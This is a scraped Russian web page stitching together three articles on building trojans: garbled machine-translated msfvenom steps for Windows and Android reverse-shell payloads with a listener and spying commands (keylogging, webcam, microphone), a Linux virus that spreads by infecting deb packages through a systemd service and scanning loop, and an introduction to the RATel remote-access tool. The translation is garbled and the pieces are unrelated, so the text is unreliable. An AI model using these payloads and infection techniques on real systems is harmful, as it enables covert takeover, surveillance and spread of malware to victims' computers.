Как создавать троянские программы

Я считаю, что у многих людей есть это чувство. Я чувствую, что те, кто сделает троянский вирус, очень крупный рогатый скот. Конечно, они полностью пишут на троянских вирусов, но на самом деле, большинство людей находятся на основе предшественников модификации, есть много Инструменты, созданные для интереса, изучите «черную» технологию и практикуют его! Суммируйте несколько простых использований инструмента, если вы будете использовать эти инструменты, вы обнаружите, что теперь может быть троян, который вы так сложно! Эта статья Дух исследований, все поведение атаки тестируются, пожалуйста, не используйте для нелегальных целей!

Тестовая среда: Kali Linux Windows7 Windows 10 Android

Основные инструменты: Metasploit Framework

Что касается использованных инструментов, эта статья не вводится слишком много, введенный здесь метод использования является наиболее основным простым использованием:

1. Используйте инструмент Metas Ploit для переживания трояна (версия Windows), команда выглядит следующим образом:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.47 LPORT=8080 -f exe >demo.exe

LHOST = IP-адрес позади — ваша собственная локальная сеть IP. В настоящее время все тесты на атаку пробовали только в локальной сети, которая является интранет, и использование внешней сети не очень понятно!

[KV] Как сделать свой троян / бэкдор? Delphi 7

Demo.exe Скопируйте файл трояна на другой компьютер, дважды щелкните! Согласно тесту, троян может пройти 360 охранников, компьютерных экономных экономников и другого общего антивирусного программного обеспечения! Это не означает ничего шифрования плюс в Случай оболочки . но в компьютере 360 человек может быть убит! Может быть, версия другая

2. Откройте программное обеспечение, настройте хороший монитор, команда следует:

use exploit/multi/handler set payloads windows/meterpreter/reverse_tcp set LHOST 192.168.1.47 set LPORT 8080 exploit

3. сидеть и ждать

В это время до тех пор, пока другой компьютер щелкните, чтобы запустить файл Trojan Demo.exe, вы можете получить информацию, установить соединение! Вы можете выполнить некоторые инструкции в проникновении. Другая сторона теперь полностью контролируется под вашим контролем, обычная команда составляет:

Сисинфо / / Просмотр Системная информация о хосте атаки Убить // Конечный процесс PS // Просмотр процесса Перезагрузка // Перезагрузите компьютер Reg / / modify реестр Shell // Получить оболочку Выключение // Выключить компьютер Keyscan_start // Откройте функцию записи kitsubily Keyscan_dump / / Просмотреть информацию о записи Kita Keyscan_stop // Остановите запись логотипа Скачать // Загрузка файла Загрузить // Загрузить файл UICTL Включить клавиатуру // Получить контроль мыши клавиатуры Record_mic / / audio запись Webcam_chat / / Просмотр интерфейса камеры Webcam_list / / Просмотр списка камеры WebCAM_Stream // Camera Video Compisition .

Читайте также:
Программы для логотипов отзывы

4. Создайте версию трояна Android, на самом деле шаги почти

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.47 LPORT=8080 -r >demo.apk

До тех пор, пока вы загружаете его на свой телефон, ваш телефон в основном кто-то другой, получите контактную адресующую книгу позиционирование открытой камеры photo . и тест, мобильный телефон Xiaomi поставляется с Центром безопасности Trojans полностью бесполезный!

Как создавать троянские программы с помощью Powershell

Однако, согласно знаниям, я временно понимаю, это немного расстояния от полного трояна:

1. Антивирусное программное обеспечение. Согласно моему тесту, компьютерная экономника Tencent — это мусор. Если я не могу его сканировать, у меня будет модный, 360 в основном развертывается, после простого шифрования кодирования, 360 подскажет процедуру риска, И система поставляется с защитником Windows — это немного нет. Но если вы хотите сделать трояны, чтобы избежать убийства, вы должны потратить некоторые усилия .

2. Троян непрерывный латте. Так называемая непрерывная латте состоит в том, чтобы разрешить трояны начать, тестировать, тест, методы 2 поставляются с MSF, недействителен . временно не нашел метод возможностей!

3. Внешний сетевой контроль. Это большая проблема, это сложнее решить, и теперь атака основана на той же локальной сети!

4. Проблемы разрешений. 360 — это проблема, работающая на некоторых машинах, таких как открытие камеры, 360 будет иметь подсказку . и трояны не имеют возможности завершить 360 процессов, поэтому яичко болит!

В повседневной жизни существует очень мало ситуаций, которые специализируются на атаке определенных людей. Многие раз хакеры используют инструменты автоматизации по всей сети, используя некоторые публичные уязвимости для атаки! Обычные люди могут сделать только для того, чтобы эти автоматические хакеры инструменты Трюк в порядке, Если некоторые люди или организация хотят чернить вас, это действительно просто .

Источник: russianblogs.com

Троянский пингвин: Делаем вирус для Linux

Нет, я не собираюсь рассказывать, как написать своего шифровальщика-вымогателя, майнера или эксплуатировать супер-новую уязвимость, как вы могли подумать. И тем более я не горю желанием поднимать холивар «Linux безопаснее Windows?(да)». Моей целью было написание простого вируса для linux, некого, так сказать, «Just for Fun», единственной функцией которого является распространение своей копии. О том, что у меня получилось, я расскажу в этой статье. В конце я приведу ссылку на GitHub с исходниками.

image

Дисклеймер

Данная статья написана в ознакомительных целях. Автор ни в коем случае не призывает читателей к нарушению законодательства РФ. Пожалуйста, не повторяйте действия, описанные в данной статье, предварительно не ознакомившись с главой 28 УК РФ.

Читайте также:
Ракета упала из за ошибки программы

И что мы, собственно, будем делать?

Самым простым в реализации механизмом распространения вируса для меня показалось распространение через модифицированные deb/rpm пакеты. Пакеты формата deb и rpm сейчас являются наиболее популярным средством распространения по для Linux. Я остановил свой выбор на формате deb, так как количество пользователей Debian-based дистрибутивов преобладает над пользователями Red Hat и ее «последователей».

Еще необходимо, чтобы вирус автоматически запускался, и через каждый определенный период времени сканировал компьютер в поисках deb-пакетов. Для удобства отладки я выбрал период равный 10 минутам.

Что такое deb-пакет?

Deb-пакет представляет из себя архив формата .ar, который не использует сжатие. Внутри архива еще три файла: debian-bynary, control.tar и data.tar

debian.binary — текстовый файл, содержащий версию формата deb-пакета, на данный момент там всегда пишут «2.0».

control.tar — архив с файлами, содержащими информацию о пакете (например — обязательный файл control) и пакеты, необходимые для установки пакета (например — скрипты preinst, postinst, prerm и postrm, запускаемые до/после установки/удаления пакета). Может быть сжат с помощью gzip или xz, в таком случае к имени архива добавляется расширение .gz или .xz соответственно.

data.tar — архив с директориями, содержащими устанавливаемые файлы. Директории представлены деревом, в виде которого они должны извлечься в корень файловой системы. Может быть сжат с помощью gzip, bzip2, lzma, xz.

Нам необходимо обратить внимание на файл control из архива control.tar. Этот файл содержит информацию о пакете, такую как автор, описание, версию, приоритет пакета в системе и т. д. Меня интересует поле depends, в котором указаны зависимости (пакеты, без которых по из данного пакета не может работать). В это поле наш вирус будет дописывать fakeroot и dpkg — утилиты, которые понадобятся при модификации других пакетов на зараженном компьютере.

Для сборки deb-пакета создается корневая директория пакета. В нее кладутся директории с устанавливаемыми файлами и директория DEBIAN, содержащую служебные файлы, среди которых control и скрипты для установки/удаления. Затем выполняется команда fakeroot dpkg-deb —build ./path.

Сначала был демон

На момент написания вируса я еще плохо представлял, что такое Cron, и поэтому пошел путем написания собственного демона для systemd. Я создал файл trojan_penguin.service, который будет помещаться в директорию /lib/systemd/system, и добавил в нее следующее:

[Unit] Description = XXX [Service] ExecStart=/usr/bin/trojan_penguin.sh Type=fork [Install] WantedBy=multi-user.target

ExecStart=/usr/bin/trojan_penguin.sh — тут я указал путь к файлу (к будущему вирусу), который должен запускаться при старте системы.

Type=fork — это строка показывает, что процесс должен ответвиться от родительского процесса.
Я не видел необходимости в PID-файле, по этому я не стал его добавлять.

В мануалах по написанию своего демона фалы .service предлагается размещать в директориях /usr/lib/systemd/system/ или /etc/systemd/system/. Но я в своей убунте нашел директорию /lib/systemd/system. (у меня туда попал apache2.service). Может быть кто-нибудь в комментариях напишет, для чего нужна эта директория, и чем она отличается от двух других.

Файл /usr/bin/trojan_penguin.sh у меня получился таким:

Читайте также:
Что входит в систему управления программами и портфелями проектов

#!/bin/bash #debug=». /Programming/projects/TrojanPenguin» debug=»» #создаем папку для записи логов, если таковой нет if ! [ -d $debug/var/log/trojan_penguin/ ]; then mkdir $debug/var/log/trojan_penguin fi #работаем в бесконечном цикле, #делая паузы по 10 минут while [ 1 ] do list=$(find /home -name «*.deb») #ищем deb-пакеты # для каждого найденного пакета выполняем следующий цикл for line in $list do $debug/usr/bin/tp_infect.sh $line >> $debug/var/log/trojan_penguin/log #запускаем цикл, модифицирующий пакет, а логи записываем в файл log done date > $debug/var/log/trojan_penguin/last_start #записываем время последней отработки вируса (мне это помогло во время отладки) sleep 600 #пауза (60 * 10 сек = 10 мин) done

Как создать троян для удаленного доступа к Windows?

Мануал

Автор cryptoparty На чтение 6 мин Опубликовано 02.05.2023

Удаленный доступ к Windows – критически важный аспект обеспечения безопасности компьютерных систем и сетей.

Инструменты тестирования на проникновение, такие как RATel, необходимы для имитации атак на систему, чтобы обнаружить уязвимости и оценить эффективность принятых мер безопасности.

RATel, инструмент с открытым исходным кодом, завоевал популярность среди специалистов по кибербезопасности благодаря своей способности взять под контроль машину Windows.

RATel работает по модели клиент-сервер, когда сервер посылает команды, а клиент выполняет их и отправляет результаты обратно на сервер.

Этот инструмент был первоначально разработан группой итальянских исследователей безопасности в 2010 году и с тех пор обновляется и совершенствуется сообществом участников.

Особенности RATel

  • Множественные подключения
  • Широковещательная рассылка команд всем клиентам
  • Хранение информации о клиентах в базе данных
  • Шифрование данных в сети с помощью XOR
  • Система управления токенами для идентификации клиентов
  • Управление юникодом
  • Шифрование данных, передаваемых по сети
  • Сохранение запуска
  • Удаленное выполнение команд через CMD
  • Удаленное выполнение команд через Powershell
  • Шифрование данных по сети с помощью XOR
  • Автоматическая персистентность при запуске клиента
  • Автоматическое переподключение
  • Управление юникодом
  • Автоматическая компиляция клиента

В этом руководстве мы создадим полезную нагрузку для Windows с помощью RATel под управлением Kali Linux и проведем атаку на целевую машину под управлением Windows 10.

Требования

  • Целевая машина (на нашей целевой машине в этом руководстве установлена Windows 10).
  • Машина злоумышленника
  • Python3

Установка RATel

Наш рабочий компьютер работает под управлением Kali Linux.

Чтобы установить и использовать RATel на нашем ПК, нам нужно установить необходимые зависимости для работы инструмента с помощью следующей команды.

sudo apt-get install git python3-pip mingw-w64

После завершения установки мы можем приступить к установке, запуску и использованию RAT-el для создания полезной нагрузки Windows RAT.

Рейтинг
( Пока оценок нет )
Загрузка ...
EFT-Soft.ru